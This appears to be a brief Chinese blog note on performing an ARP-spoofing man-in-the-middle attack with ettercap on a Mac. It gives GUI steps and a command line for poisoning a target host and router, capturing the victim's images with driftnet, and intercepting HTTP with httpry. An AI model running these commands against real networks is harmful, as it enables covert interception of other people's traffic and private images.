使用工具
#获得当前路由地址
route -n get default
mac上已经安装 ettercap
#GUI界面
sudo ettercap -G
#命令行界面
sudo ettercap -C
运行ettercap,
使用步骤
- 选择Sniff----Unified-sniffing,然后选择网卡:
- Hosts---Scan for hosts---Hosts list,此时可以看到目标主机ip(192.168.1.107)
- 选定目标主机,然后点add to target 1,将目标主机添加到目标1;选定路由(一般是192.168.1.1),点add to target 2,将路由添加到目标2:
- 然后点mitm --- arp posoning ,勾选sniff remote connections:
- 之后start --- start sniffing开始监听~
- 点view -- connections开始查看连接:
拦截图片
#对目标主机进行arp欺骗
sudo ettercap -i wlan0 -Tq -M arp:remote /192.168.1.107/ /192.168.1.1/
拦截图片
#新建一个终端窗口,执行:
driftnet -i wlan0 #监听wlan0
更多嗅探工具
在ubuntu上很容易安装
- httpry (拦截http请求)
- driftnet(拦截图片)